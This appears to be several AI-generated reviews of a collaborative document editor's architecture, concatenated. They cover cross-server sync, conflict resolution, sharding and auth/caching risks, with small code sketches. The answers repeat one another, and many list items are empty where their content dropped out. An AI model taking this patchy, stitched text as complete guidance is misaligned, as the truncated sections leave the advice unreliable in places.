Solution: Use a sticky session approach with the load balancer to ensure users reconnect to the same server, and implement a health check mechanism to quickly reroute traffic to healthy servers.
Trade-offs: Sticky sessions can lead to uneven load distribution, but they help in maintaining connection state.
Issue: Two users editing the same document section simultaneously could lead to data inconsistency.
Solution: Instead of a simple last-write-wins strategy, implement operational transformation (OT) or conflict-free replicated data types (CRDTs) for better handling of concurrent edits.
Trade-offs: OT and CRDTs are more complex to implement but provide a better user experience by allowing real-time collaboration without losing changes.
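To make the OT idea concrete, here is the transform for the simplest case, two concurrent inserts; a real OT system also handles deletes, retains, and operation composition, and the names here are illustrative. The point is that both sites apply both edits and converge to the same string, instead of one edit overwriting the other.

```javascript
// Transform op `a` so it can apply after concurrent op `b` has been applied.
// Positions shift right when the other insert landed at or before ours;
// ties break deterministically by site id so both sites agree.
function transformInsert(a, b) {
  if (b.index < a.index || (b.index === a.index && b.site < a.site)) {
    return { ...a, index: a.index + b.text.length };
  }
  return a;
}

function applyInsert(text, op) {
  return text.slice(0, op.index) + op.text + text.slice(op.index);
}
```

Convergence check: site 1 applies its own op then the transformed remote op, site 2 does the reverse, and both end up with the same document.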
Issue: Servers polling for changes every 2 seconds might read stale data or miss changes made by users connected to other servers.
Solution: Instead of polling, consider using a pub/sub mechanism where changes are published to a message broker (like Redis Pub/Sub) and subscribed to by all servers.
Trade-offs: This requires additional infrastructure and complexity, but it reduces the chances of stale reads and improves real-time sync.
Issue: As the number of users grows, the database may become a bottleneck, especially for write operations.
Solution: Implement database sharding based on document ownership or organization ID to reduce load on individual database instances. Use read replicas to balance read operations.
Trade-offs: Sharding increases complexity in database management and may require changes to application logic, but it significantly improves scalability.
Issue: Each API server has a limit on the number of concurrent WebSocket connections it can handle.
Solution: Introduce a WebSocket gateway layer that can handle connections and distribute messages to the appropriate API servers. Use load balancing for WebSocket connections.
Trade-offs: This introduces an extra layer in the architecture, which can add latency but allows for better management of connections and scaling.
Issue: Using Redis for session caching may lead to stale data if not handled properly.
Solution: Implement a cache invalidation strategy, such as time-based expiration or invalidating the cache on certain write operations.
Trade-offs: While this adds complexity to the caching layer, it ensures data consistency and reduces the risk of serving outdated data.
By addressing these potential failure modes, race conditions, and scaling bottlenecks, the architecture can be made more robust and scalable. The trade-offs involved in each solution should be carefully considered based on the specific performance needs and user experience expectations of the collaborative document editor.
Key issues fall into consistency, real‑time propagation, storage, scaling, and security.
A typical production architecture instead uses: a pub/sub or event-log tier for cross-server fan-out, server-ordered OT/CRDT synchronization, and an append-only operation log with periodic snapshots.
This avoids polling, reduces DB load, and ensures consistent real-time collaboration.
Great prompt. This architecture has several correctness, availability, and scalability risks that will show up quickly under real collaborative load.
Below is a structured review of failure modes + concrete fixes + trade-offs.
Each API server only broadcasts to WebSocket clients connected to that server.
Users on different servers won’t see updates immediately (or at all until poll catches up).
Add a cross-node pub/sub layer (Redis Pub/Sub, NATS, Kafka, or managed equivalent).
On receiving an edit, publish to document channel; all servers subscribed fan out to local sockets.
Polling creates lag + load, and can miss ordering nuances.
Replace polling with push: publish each committed operation to a broker (Redis Pub/Sub, NATS, Kafka) and have every server subscribe.
Clock skew, bad device clocks, malicious clients can “win” incorrectly.
Use server-assigned monotonic versioning per document (sequence numbers or Lamport/vector clocks).
For true collaborative editing, use OT or CRDT rather than paragraph-level LWW.
Two users edit different words in same paragraph; one overwrites the other.
Use an operation-based model: represent edits as character/range operations and merge concurrent ones with OT or a CRDT so neither user's words are lost.
Edits can arrive in different orders on different nodes.
Per-document sequencer (single writer shard) or ordered log partition by doc_id.
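A per-document sequencer can be as small as a counter keyed by document ID; this is a sketch with illustrative names, and in production the counter must live on the document's single authoritative shard so there is exactly one writer per document.

```javascript
function createSequencer() {
  const counters = new Map(); // docId -> last assigned sequence number
  return function assign(docId, op) {
    const seq = (counters.get(docId) ?? 0) + 1;
    counters.set(docId, seq);
    return { ...op, seq }; // broadcast and persist ops in `seq` order
  };
}
```

Every server and client then agrees on one canonical order for a document's edits, independent of arrival order.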
Typing generates huge write QPS; DB becomes bottleneck.
Buffer edits in memory/event log, persist in batches (e.g., every N ops / seconds), plus periodic snapshots.
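A sketch of the batching buffer with hypothetical names; `persistBatch` stands in for one multi-row INSERT. Note the durability trade-off: ops buffered but not yet flushed are lost on a crash unless they are also written to a durable log first.

```javascript
function createBatcher(persistBatch, maxOps = 100) {
  const buffers = new Map(); // docId -> pending ops

  function flush(docId) {
    const ops = buffers.get(docId);
    if (ops && ops.length) {
      buffers.set(docId, []);
      persistBatch(docId, ops); // one write instead of ops.length writes
    }
  }

  return {
    add(docId, op) {
      const ops = buffers.get(docId) ?? [];
      ops.push(op);
      buffers.set(docId, ops);
      if (ops.length >= maxOps) flush(docId); // size-triggered flush
    },
    flush, // also call on a timer for each active doc (time-triggered flush)
  };
}
```

Tuning `maxOps` and the timer interval trades write amplification against the size of the window of at-risk edits.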
Write amplification + storage bloat + hard diff/replay semantics.
Store: an append-only operation log as the source of truth, plus periodic snapshots for fast loads and bounded replay.
Dynamic/authenticated API responses cached and served stale or to wrong users if cache key misconfigured.
Do not cache mutable/auth APIs at CDN by default.
If caching, use strict cache keys (Authorization, tenant, doc), short TTL, and Cache-Control: private, no-store where needed.
XSS can steal token; long-lived token increases blast radius.
Use httpOnly, secure, sameSite cookies + short-lived access tokens + refresh rotation + token revocation list.
Socket stays alive after token expiry/revocation.
Revalidate auth on socket connect + periodic checks + forced disconnect on revocation event.
Reconnects land on different servers; local in-memory session/state lost.
Use either: externalized session state (e.g., Redis) so any server can resume a reconnect, or document-based routing so reconnects land on the authoritative shard.
Network retry sends same op multiple times.
Attach operation IDs (UUID + client seq), dedupe per document/client.
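A dedup sketch keyed by client ID and per-client sequence number; names are illustrative, it assumes each client's operations arrive in order, and production state would be persisted per document rather than held in memory.

```javascript
function createDeduper() {
  const lastSeq = new Map(); // clientId -> highest clientSeq already applied
  return function shouldApply(op) {
    const seen = lastSeq.get(op.clientId) ?? -1;
    if (op.clientSeq <= seen) return false; // duplicate or stale retry: drop it
    lastSeq.set(op.clientId, op.clientSeq);
    return true;
  };
}
```

The server calls `shouldApply` before applying any incoming operation, making client retries safe (at-most-once application per operation).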
Slow clients/sockets buffer indefinitely; memory blowups.
ACKed delivery windows, bounded queues, drop/close slow consumers, resumable sync via version catch-up.
Replica lag gives stale reads for active documents.
Route collaborative doc reads to primary or session-consistent store; use replicas only for analytics/search/non-critical reads.
Hot-tenant problem: one large org overloads a shard.
Partition primarily by document_id (or hash), optionally with org-aware placement constraints.
In-flight edits in memory are lost if node crashes before DB persist/broadcast.
Write-ahead to durable log before ACK (Kafka/Redis Stream with AOF), then process/broadcast.
Region outage = total downtime/data unavailability.
Define RPO/RTO; implement cross-region replication + failover strategy. For real-time collab, usually active-passive per document region.
Stored XSS/script injection in document HTML.
Use structured document model (ProseMirror/Slate schema) and sanitize/render safely server-side + CSP.
Hard to diagnose ordering and merge bugs without traceability.
Instrument per-op tracing: doc_id, op_id, version, server, latency; define SLOs for fanout lag/conflict rate.
Different components assume different guarantees (eventual vs strong).
Define the contract clearly: which reads must be strongly consistent (active editing sessions) and which may be eventual (search, analytics, admin views).
If you want, I can sketch a concrete “v2” design with specific tech choices (e.g., Redis Streams vs Kafka, OT vs Yjs CRDT) and expected throughput limits.
Here’s a structured teardown of the architecture: failure modes, race conditions, correctness issues, security problems, and scaling bottlenecks — plus concrete fixes and trade-offs.
Each API server only broadcasts to clients connected to itself. Clients connected to different servers won’t see updates until those servers poll PostgreSQL 2 seconds later.
Use a shared realtime fan-out layer:
Each server publishes incoming operations to a shared channel keyed by document ID, and all servers subscribed to that document broadcast immediately to their local WebSocket clients.
Using the primary database as a synchronization bus is a bad fit.
Stop polling PostgreSQL for realtime sync. Use: a pub/sub broker (Redis Pub/Sub, NATS) or a shared event log (Kafka, Redis Streams) instead.
This is one of the most dangerous design choices.
Do not use client time for conflict resolution.
Use one of: server-assigned sequence numbers, Lamport/vector clocks, or OT/CRDT ordering.
For rich text collaborative editing, OT or CRDT is the right answer.
Saving full HTML snapshots is expensive and unsafe as the primary source of truth.
Store: a canonical structured document model plus an append-only operation log, with periodic snapshots for compaction.
Then derive HTML for rendering/export.
If edits arrive at different servers, there is no authoritative ordering before persistence and rebroadcast.
Create per-document ordering: route every operation for a document through one sequencer, or through one ordered log partition keyed by document ID.
Paragraph-level overwrite loses intent. Two users changing different words in the same paragraph will conflict unnecessarily.
Move from paragraph-level overwrite to operation-level editing: character/range operations that can be merged instead of overwritten.
A change may be: lost in transit, duplicated by a retry, or delivered out of order.
Without idempotency, clients can apply same change twice.
Every operation needs: a unique operation ID (client ID plus a per-client sequence number) so servers can deduplicate retries.
If a client disconnects briefly, it may miss operations sent while offline.
Use resumable streams: clients reconnect with the last version they applied, and the server replays the operations they missed.
WebSocket send does not imply client processed the message.
Implement an explicit protocol: clients acknowledge each applied operation, and the server tracks per-client delivery state so unacked operations can be re-sent.
The sequence described is: receive edit → write to PostgreSQL → broadcast to local WebSocket clients.
What if broadcast succeeds but DB write fails? Or DB succeeds and broadcast fails?
Define a transactional ingestion path: persist the operation durably first, then broadcast only after commit.
If using event log, broadcast consumers only emit committed events.
Read replicas are often asynchronously replicated.
For collaboration-critical reads: route to the primary (or the document's authoritative shard), and reserve replicas for analytics, search, and other non-critical reads.
Document collaboration hotspots are by document, not org. Organization-based partitioning can create skew.
Partition by document ID or hashed document ID. Optionally colocate metadata by org for admin queries, but realtime doc processing should shard by doc.
Round-robin without session affinity can cause reconnects to land anywhere, which is okay only if backend state is shared properly. In current design it is not.
Either: make WebSocket gateways stateless over a shared pub/sub layer, or route connections by document to an authoritative shard.
Avoid depending on sticky sessions for correctness.
Each server holds active WebSocket connections and maybe ephemeral session/presence info, all of which a crash loses. Persist operations durably before acknowledging, and let clients reconnect and resume by version.
Some clients or servers will be slow.
Implement backpressure: bounded per-client send queues, acknowledged delivery windows, and disconnecting consumers that fall too far behind (they resync on reconnect).
A popular doc with hundreds/thousands of editors creates a concentrated hotspot.
For hot docs: give the document a dedicated shard/sequencer, batch and coalesce broadcasts, and fan out through the pub/sub tier.
localStorage is vulnerable to token theft via XSS.
Use: short-lived access tokens in `HttpOnly`, `Secure`, `SameSite` cookies, with rotating refresh tokens and revocation.
Long-lived bearer tokens are risky, especially for collaborative apps used in browsers.
Caching API responses broadly is dangerous for auth, document freshness, and privacy.
Do not CDN-cache mutable authenticated document APIs unless very carefully controlled.
Clients are untrusted.
Server-authoritative sequencing and validation.
If every edit event hits PostgreSQL synchronously, write amplification will be severe.
Options: batch inserts into an append-only operations table, buffer through a durable stream (Kafka, Redis Streams) before persisting, or both.
If a single document row is frequently updated, MVCC churn and row contention become painful.
Use append-only operations table/log instead of repeatedly rewriting one giant document row. Checkpoint periodically into snapshots.
HTML from browser/editor is not a stable canonical model.
Canonical structured editor model + strict sanitization for imported/exported HTML.
If edits are acknowledged before durable persistence and only snapshots happen every 30s, crash can lose “saved” work.
Durable operation append before ack. Snapshot only for compaction, not durability.
Clients may receive: operations out of order, duplicated, or with gaps after a reconnect.
Version every op and require ordered apply. Buffer out-of-order messages until missing versions arrive or trigger resync.
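A sketch of ordered apply with buffering (names illustrative; `apply` stands in for whatever updates the local document): out-of-order operations wait in a map until the missing versions arrive, then drain contiguously.

```javascript
function createOrderedApplier(apply, startVersion = 1) {
  let next = startVersion;
  const pending = new Map(); // version -> buffered op
  return function receive(op) {
    pending.set(op.version, op);
    while (pending.has(next)) { // drain everything that is now contiguous
      apply(pending.get(next));
      pending.delete(next);
      next += 1;
    }
  };
}
```

A production client would also set a timer: if a gap persists too long, request a resync from the server instead of buffering forever.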
WebSockets may appear connected while dead due to proxies/NATs.
Heartbeat protocol with timeout-based disconnect and reconnect.
Ephemeral high-frequency updates can overwhelm critical edit pipeline.
Separate channels: a lossy, throttled presence/cursor channel distinct from the durable edit channel.
With naive LWW and snapshots, collaborative undo is ill-defined.
Use operation-based model with per-user undo semantics integrated with OT/CRDT/editor framework.
If users go offline and edit, reconnecting with LWW timestamps is destructive.
If offline support is needed:
As editor features evolve, old snapshots/ops may become incompatible.
Version the document schema and operation format; support migration or transcoding.
Current design lacks clear operation lineage.
Maintain audit trail:
Collaborative endpoints are easy to abuse.
A stronger architecture would look like this:
- Shard by document_id.

If you had to improve this incrementally:
| Issue | Risk | Fix | Trade-off |
|---|---|---|---|
| Local-only WebSocket broadcast | stale/inconsistent updates | shared pub/sub or doc shard | extra infra |
| DB polling for sync | latency, DB load | event bus | complexity |
| Client timestamp LWW | lost edits, abuse | OT/CRDT/server sequencing | hard implementation |
| Full HTML snapshots | write amp, poor merges | op log + snapshots + canonical model | more data model work |
| No global ordering | divergence | per-doc sequencer/leader | hotspot management |
| Paragraph conflict unit | excessive overwrites | character/range ops | editor integration |
| Duplicate change application | corruption | op IDs + idempotency | metadata overhead |
| Reconnect gaps | stale clients | replay by version | op retention needed |
| No ack protocol | ambiguous state | explicit acks | protocol complexity |
| DB write/broadcast race | phantom/lost edits | commit then broadcast from log | slight latency |
| Read replica lag | stale reads | primary/leader reads | more primary load |
| Partition by org | skew/hotspot | shard by doc ID | harder org queries |
| Round-robin WS | inconsistent state | stateless gateways or doc routing | routing complexity |
| Server crash | disconnect/state loss | durable ops + reconnect/resume | more engineering |
| Slow consumers | memory bloat | backpressure/disconnect | slow clients resync |
| Hot docs | shard overload | dedicated doc shard, batching | special handling |
| JWT in localStorage | token theft | HttpOnly cookies/short tokens | auth complexity |
| 24h JWT | long compromise window | short-lived + refresh | more token flow |
| CDN API caching | stale/leaked data | no-store/private | more origin traffic |
| Per-keystroke DB writes | DB bottleneck | batching/log append | complexity |
| HTML canonical storage | inconsistency/XSS | structured model | conversions needed |
If you want, I can also provide:
Below are the main failure modes, race conditions, and scaling bottlenecks in this design, with concrete fixes and trade-offs.
Using timestamps from client clocks is highly unsafe.
Failure modes:
Use server-assigned ordering or a proper conflict-free editing model; each client op should carry the base_version it was made against.

Every keystroke causes a DB write. This creates:
Introduce an append-only change log or event stream:
Updates only reach clients on the same API server, while other servers poll the database every 2 seconds.
Failure modes:
Use a shared pub/sub backbone:
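For example, with every API server publishing each accepted op to a per-document channel and forwarding what it receives to its local WebSocket clients. An in-process `EventEmitter` models the broker here for illustration only; the real backbone would be Redis pub/sub, NATS, or Kafka:

```typescript
import { EventEmitter } from "node:events";

// Stand-in for the shared broker. channel = one topic per document.
const broker = new EventEmitter();

// Called by whichever server accepted the edit.
function publishOp(docId: string, op: string): void {
  broker.emit(`doc:${docId}`, op);
}

// Each server subscribes for the documents its sockets have open and
// forwards ops to those sockets via `deliver`.
function subscribeDoc(docId: string, deliver: (op: string) => void): void {
  broker.on(`doc:${docId}`, deliver);
}
```

With this in place, fan-out is immediate on every server, and the 2-second poll can be dropped entirely.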
Polling is inefficient and creates scaling bottlenecks.
Failure modes:
Replace polling with event-driven notification:
Use PostgreSQL LISTEN/NOTIFY for lightweight signaling, plus a durable changes table for replay.

“Last timestamp wins” is not safe for collaborative text editing.
Failure modes:
Use:
If paragraph-level, each edit should carry paragraph_id, base_version, and a patch.

Snapshots every 30 seconds are too coarse and inefficient.
Failure modes:
Use incremental persistence:
WebSocket connections are sticky by nature, but the architecture doesn’t mention session affinity or reconnection strategy.
Failure modes:
Implement:
Storing JWTs in localStorage is vulnerable to XSS theft.
Failure modes:
Use HttpOnly, Secure, SameSite cookies for auth, or short-lived access tokens with refresh tokens in HttpOnly cookies. Also:
A 24-hour token is too long-lived for a collaborative SaaS application.
Failure modes:
Caching dynamic API responses through CloudFront can serve stale document state and even stale auth-dependent data.
Failure modes:
Set Cache-Control: no-store on auth/session-sensitive and live document endpoints.

PostgreSQL can be a bottleneck under high-frequency collaborative edits.
Failure modes:
Split responsibilities:
Add:
Read replicas do not help real-time consistency if they lag.
Failure modes:
Use replicas only for:
For document sessions:
Partitioning by org may create hot partitions if one org is much larger or more active.
Failure modes:
Partition by a higher-cardinality key such as org_id + document_id.

WebSocket retries, reconnects, and network glitches can duplicate edits.
Failure modes:
Make every mutation idempotent:
Typing generates high-frequency messages.
Failure modes:
If all updates are treated the same, transient UI signals can overload the system.
Separate:
Use a different channel or lower durability path for presence.
If one API server dies, all its socket-connected users lose in-flight state.
Failure modes:
The architecture doesn’t define whether edits are at-most-once, at-least-once, or exactly-once.
Failure modes:
Define a protocol: each op carries op_id, doc_id, and base_version; the server replies with ack(op_id, new_version).

A large team editing the same doc concentrates load on one document row or blob.
Failure modes:
Store documents as smaller independently mutable units:
Storing full HTML snapshots is fragile for collaborative editing.
Failure modes:
Use an internal structured document model:
HTML snapshots and user-generated content can carry XSS risks.
Failure modes:
This system will be difficult to debug without strong tracing and metrics.
Failure modes:
Add:
If you want this to behave like a real collaborative editor, a safer design is:
Client
WebSocket/API servers
Event bus
Document service/storage
Auth
CDN
If you only change a few things, these are the most important:
If you want, I can turn this into a risk matrix with severity/probability, or propose a corrected reference architecture with components and data flow.
Below is a structured list of likely failure modes, race conditions, and scaling bottlenecks in your design, with a concrete mitigation and trade-offs for each. (Some issues are “systemic” because the architecture relies on client clocks, per-server WebSockets, polling, and periodic full snapshots.)
Failure mode:
If clients for the same document are connected to different API servers, updates sent by Server A won’t reach clients on Server B until Server B’s polling loop picks them up (2s delay), causing visible lag, inconsistent cursors, or temporary divergence.
Specific solution:
Use a shared pub/sub bus for realtime events:
Trade-offs:
Bottleneck:
Polling all documents every 2 seconds doesn’t scale—especially with many documents or write-heavy editing. It also creates inherent staleness up to 2 seconds (bad UX).
Specific solution:
Replace polling with event-driven updates:
Trade-offs:
Race condition / failure mode:
Client timestamp comparisons will be wrong when clocks differ or when device time changes (NTP adjustments, manual changes, mobile sleep/wake). Two edits may be applied out of intended order.
Specific solution:
Use server-assigned ordering per document:
- Each accepted op gets a monotonically increasing revision (or opId) assigned by the server.
- Each client edit references its base revision and/or uses vector clocks/Lamport timestamps.
- Conflicts are resolved by revision ordering (not client time).

Trade-offs:
Failure mode:
Paragraph-level last-write-wins will still corrupt content when edits overlap partially, insertions shift offsets, or formatting changes occur.
Specific solution (recommended):
Use an actual collaborative editing algorithm:
Trade-offs:
(If you must keep last-write-wins temporarily, at least operate on smaller units than “paragraph” such as character ranges, and incorporate server revision ordering.)
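A sketch of such server revision ordering, assuming a single sequencer per document (names illustrative): an edit made against a stale base is rejected so the client can rebase and resend, rather than silently overwriting newer work.

```typescript
// Per-document monotonic revision assignment, replacing client clocks.
class DocSequencer {
  private revision = 0;

  // Returns the new revision on success, or null if the edit was made
  // against a stale base and must be rebased by the client.
  accept(baseRevision: number): number | null {
    if (baseRevision !== this.revision) return null;
    this.revision++;
    return this.revision;
  }

  get current(): number { return this.revision; }
}
```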
Failure mode:
If the same client reconnects or new connections occur, they may land on different servers. Without a shared realtime pipeline, state consistency depends on slow polling.
Specific solution:
Trade-offs:
Bottleneck:
High-frequency writes (every input event) can overwhelm PostgreSQL, WAL, indexes, and replication.
Specific solutions (choose one or combine):
Trade-offs:
Failure mode:
Specific solution:
Trade-offs:
Failure mode:
If API responses that include document content/state are cached, clients can receive stale versions or stale revision numbers for up to 5 minutes, causing overwrites or confusing UI.
Specific solution:
Trade-offs:
Failure mode:
Specific solution:
Trade-offs:
Failure mode:
If Redis caches doc/session state but updates are only written to Postgres, you can get divergence:
Specific solution:
Trade-offs:
Race condition:
Even with “last timestamp wins”, persistence order across servers may not match actual edit order. Also, if each server independently persists to Postgres without a consistent per-doc sequencing mechanism, you can get revisions applied in an unexpected order.
Specific solution:
orgId + docId into shards.Trade-offs:
Failure mode:
WebSocket reconnections, network retries, or client resends can cause the same “change event” to be applied twice.
Specific solution:
Attach a clientOpId (unique per doc per client/session) to every change and dedupe on the server.
Failure mode:
If a client’s network is slow, the server may buffer outbound events, leading to memory pressure or event drops. If events drop, doc divergence can occur.
Specific solution:
Trade-offs:
Failure mode:
After deployment or network disruption, many clients reconnect simultaneously to different servers. Each may:
Specific solution:
Trade-offs:
Race condition:
Snapshot jobs might read while writes continue, resulting in snapshots not matching the change-log boundary.
Specific solution:
Record currentRevision = maxRevisionForDoc atomically at the snapshot boundary, so the snapshot always corresponds to an exact point in the change log.
Failure mode:
If some servers read from replicas (read-heavy) but writers commit to primary, replicas may lag. Clients could fetch a revision that hasn’t yet appeared on the replica, causing missing operations or overwrites.
Specific solution:
Trade-offs:
Failure mode:
Users editing for >24h lose auth, causing server to drop WS connections or reject requests. Collaboration breaks.
Specific solution:
Trade-offs:
Failure mode:
If invalidation logic is imperfect, the CDN continues serving stale doc state while realtime events try to correct it. The result may look like “it updates then reverts”.
Specific solution:
Trade-offs:
If you want, I can propose a concrete revised design (schema + event protocol) that keeps your stack (React/WS/Node/Postgres/Redis) but fixes the correctness/scalability issues, including: revisions, op-idempotency, pub/sub fanout, checkpointing strategy, and reconnect semantics.
This architecture will work for a demo, but it has major correctness, latency, and security problems for a Google-Docs-like editor.
| Issue | Failure mode / race | Specific fix | Trade-offs |
|---|---|---|---|
| Client timestamps for conflict resolution | Clock skew, incorrect device time, malicious clients sending future timestamps; later arrival may wrongly overwrite earlier causal edits | Use server-assigned monotonic document revisions or a single authoritative sequencer per document. For true collaborative editing, use OT or CRDT instead of LWW | More implementation complexity; single-writer-per-doc can create a hot-doc bottleneck |
| Last-write-wins at paragraph granularity | Two users edit different characters in the same paragraph and one loses all work | Use character/block-level operations with OT/CRDT (e.g. Yjs, ProseMirror collab, Automerge) | More metadata, more complex merge logic |
| No total ordering across servers | User on server A sees op1 then op2; user on server B sees op2 then op1 after polling; document diverges | Assign a per-document sequence number at one authority (doc owner/shard) and apply ops in sequence | Requires routing or coordination |
| DB commit order vs timestamp order | Two concurrent writes race in PostgreSQL; the transaction that commits last wins even if it has the “older” client timestamp | Use append-only ops + version check (expected_revision) or a sequencer; avoid blind overwrites of document state | More retry logic or ownership logic |
| Equal timestamps / timestamp collisions | Ties create nondeterministic winners | Don’t use timestamps for ordering; use sequence numbers | None, other than rework |
| Out-of-order delivery after polling | Clients on different servers receive changes late and in batches; applying naively can corrupt state | Use revisioned ops; buffer until missing revisions arrive; or move to pub/sub with ordering per doc | Slightly more state on client/server |
| Fetch/subscribe race | Client loads document snapshot, then opens WebSocket; edits committed between those steps are missed | Return snapshot with a revision number; WebSocket subscribe must say “start from revision N”; server replays N+1…current before live mode | Requires keeping recent op log |
| Duplicate delivery on reconnect/retry | Client resends an op after timeout; server applies it twice | Give every client op a UUID/idempotency key; dedupe per document | Dedupe state in memory/Redis/log |
| Lost local edits on reconnect | User types, network drops, app reconnects to a different server, pending ops vanish or get replayed wrong | Client keeps a pending op queue and resends unacked ops from last known revision | More client complexity |
| Offline edits clobber online edits | Offline user comes back with old base state; LWW overwrites newer edits | Use OT/CRDT or at least “op with base revision + server-side rebase/reject” | Rebase logic is nontrivial |
| Snapshot overwrite race | Background snapshot generated from older state may overwrite newer state if save isn’t versioned | Store snapshots with document revision and only commit them if based on the latest expected revision | More metadata; snapshot retries |
| HTML as the source of truth | HTML is non-canonical; same edit can serialize differently across browsers; formatting changes become hard to merge | Use a structured document model (ProseMirror JSON, Slate nodes, etc.) as source of truth; render HTML on read/export | Requires editor model migration |
| Structural edits break paragraph IDs | Splits/merges/lists make “same paragraph” ambiguous | Give blocks/nodes stable IDs and operate on those | Extra model complexity |
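The fetch/subscribe fix from the table above (snapshot returns a revision, subscribe replays everything after it) can be sketched over an in-memory stand-in for the op log; names are illustrative:

```typescript
// Closes the gap between loading a snapshot and going live: the client
// subscribes with the revision its snapshot was taken at, and the
// server replays every later op before streaming live ones.
type RevOp = { revision: number; data: string };

class DocChannel {
  private log: RevOp[] = [];

  publish(data: string): RevOp {
    const op = { revision: this.log.length + 1, data };
    this.log.push(op);
    return op;
  }

  // Replay ops fromRevision+1 .. current, as a subscribe handler would.
  subscribe(fromRevision: number): RevOp[] {
    return this.log.filter(op => op.revision > fromRevision);
  }
}
```

This requires retaining recent ops server-side (the table's trade-off); ops older than the oldest live snapshot can be pruned.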
| Issue | Failure mode / bottleneck | Specific fix | Trade-offs |
|---|---|---|---|
| Broadcast only to clients on the same server | Collaborators on other servers see edits up to 2s late; not acceptable for real-time editing | Introduce a cross-server fanout mechanism: Redis Pub/Sub, Redis Streams, NATS, Kafka, or a dedicated collaboration service | New infrastructure |
| Servers poll PostgreSQL every 2 seconds | High DB load, stale UX, bursty updates, poor tail latency | For small scale: Postgres LISTEN/NOTIFY. For production scale: Redis Streams / NATS / Kafka with per-doc topics or partitioning | LISTEN/NOTIFY is simple but limited; Streams/Kafka add ops burden |
| Polling by timestamp | Misses rows with same timestamp; skew breaks cursoring | Poll by monotonic revision/LSN/sequence, not timestamp | Requires schema changes |
| Round-robin LB spreads one document’s users across many servers | Every edit must cross servers; cross-node chatter grows with participants | Route by document ID affinity (consistent hashing or “doc owner” routing) so most collaborators on a doc hit the same collab shard | Harder rebalancing; hot docs still hot |
| No authoritative doc owner | Any server can accept writes for same doc; ordering becomes distributed and messy | Make each document have a single active owner/shard that sequences ops | Must handle owner failover correctly |
| Split-brain risk if using doc ownership | Two servers may think they own same doc during failover, causing duplicate writers | Use leases with fencing tokens via etcd/Consul/ZK; avoid weak ad-hoc locks | More infra complexity |
| Server crash between DB write and broadcast | Write committed, but some clients never hear about it until reconnect/poll | Use a transactional outbox or make the durable op log the source of truth and drive fanout from it | Extra table/consumer or event system |
| Server crash before DB write but after local optimistic UI | User believes edit was saved, but it was not | Client should optimistically render locally, but server must ack only after durable append; client retries unacked ops | More protocol complexity |
| Slow consumer problem | Mobile/slow clients accumulate huge outbound queues; server memory grows | Put bounds on per-connection send queues; if exceeded, drop connection and force snapshot+replay | Slow clients reconnect more often |
| No heartbeat / presence TTL | Dead connections linger; presence indicators wrong | Use WebSocket ping/pong, server-side TTLs, and presence in ephemeral store | Slight extra traffic |
| Rolling deploys / connection draining not handled | Massive reconnect storms, dropped edits during deploy | Support graceful drain, stop accepting new docs, ask clients to reconnect with last revision | More deployment logic |
| Per-keystroke messages | Too many messages/network interrupts under high typing rates | Coalesce keystrokes into ops every 20–50ms or use semantic editor ops | Slightly higher local latency, but usually imperceptible |
| Large paste / format-all operations | Huge WebSocket frames, event loop stalls, DB spikes | Chunk large ops, enforce limits, maybe treat as specialized bulk ops | More edge-case handling |
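The keystroke-coalescing row above can be sketched as follows; `flush()` would be driven by a ~20–50 ms timer on the client, but is called explicitly here so the logic is testable (names illustrative):

```typescript
// Coalesces per-keystroke changes into one op per flush window,
// cutting message rate without noticeable added latency.
class KeystrokeBatcher {
  private buffer = "";
  sent: string[] = [];

  type(chars: string): void { this.buffer += chars; }

  flush(): void {
    if (this.buffer.length === 0) return; // empty window: no message
    this.sent.push(this.buffer);          // one coalesced op on the wire
    this.buffer = "";
  }
}
```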
| Issue | Failure mode / bottleneck | Specific fix | Trade-offs |
|---|---|---|---|
| Write every change to PostgreSQL | Primary becomes the bottleneck; high fsync/WAL/index churn; p99 latency hurts typing UX | Use an append-only operation log, ideally with batching; snapshot current state periodically rather than rewriting full state per keystroke | More moving parts |
| If updates are full-document or full-paragraph writes | Row lock contention, TOAST churn, large WAL, poor vacuum behavior | Store small ops and periodic snapshots; avoid whole-document overwrite per keystroke | Requires new data model |
| Full HTML snapshots every 30s | Large writes, expensive replication, poor diffing, possible 30s recovery gaps depending on exact implementation | Snapshot every N ops or on idle, store with revision, compress; large snapshots can go to object storage with metadata in Postgres | Slightly more complex restore path |
| Ambiguous durability model | The spec says “write change to PostgreSQL” and also “save full HTML every 30s”; if snapshots are the only durable state, up to 30s of edits can vanish | Be explicit: durable op append on each accepted edit, snapshots only for recovery speed | More storage |
| Hot documents create hot rows/partitions | A single active doc overloads one DB row/table partition | Use in-memory doc actor + op log, not direct row mutation. For very large docs, consider block/subtree partitioning | Cross-block edits become more complex |
| Read replicas for active documents | Replica lag serves stale snapshots; reconnecting client may load old state then apply wrong ops | For active docs, use primary or revision-aware fetch+replay; use replicas only for history/search/analytics | Less read offload |
| Large snapshots worsen replica lag | Replication lag grows exactly when collaboration is busiest | Reduce snapshot size/frequency; offload snapshots to object storage | Recovery can be slower |
| Polling DB from every server | Thundering herd against Postgres | Move real-time propagation off the DB | Extra infra |
| Connection pool exhaustion | Many API servers + WS write paths exhaust DB connections | Separate HTTP from collab workers; use small pooled DB writer layer / async persistence | More architecture |
| Org-ID partitioning is skew-prone | One large organization becomes one hot shard; “hot org” or “hot doc in one org” still melts one partition | Shard by document ID (or virtual shards), not just org ID. Keep org as a query dimension, not primary shard key | Cross-org/tenant queries become harder |
| Horizontal API scale doesn’t help the primary DB | More app servers produce more writes against the same bottleneck | Treat collaboration as a stateful, sharded service, not just more stateless API boxes | Bigger redesign |
| Redis as shared session/cache layer | If Redis is single-node or has eviction, auth/presence/fanout can fail unpredictably | Use HA Redis; separate session/auth from ephemeral presence/pubsub; disable eviction for critical keys | Higher cost |
| Issue | Failure mode | Specific fix | Trade-offs |
|---|---|---|---|
| JWT in localStorage | Any XSS steals the token; rich-text editors have large XSS surface | Use short-lived access token in memory + HttpOnly Secure SameSite refresh cookie; strong CSP and Trusted Types | More auth complexity; cookie flows need CSRF consideration |
| 24-hour JWT lifetime | Stolen token remains valid a long time | Shorten access token TTL (e.g. 5–15 min), rotate refresh tokens, support revocation/session versioning | More refresh traffic |
| JWT + Redis “session cache” mixed model | Confusing source of truth; revocations may not apply immediately | Pick a clear model: short-lived JWT + server-side session/refresh is common | Slightly less stateless |
| Permissions can change while WS stays open | User removed from doc/org can keep editing until token expiry | On doc join, check authorization; also push revocation events and disconnect affected sockets | More auth checks / eventing |
| Token expiry during WebSocket session | Long-lived socket stays authenticated forever unless server re-checks | Require periodic reauth or close socket at token expiry and reconnect with fresh token | Some reconnect churn |
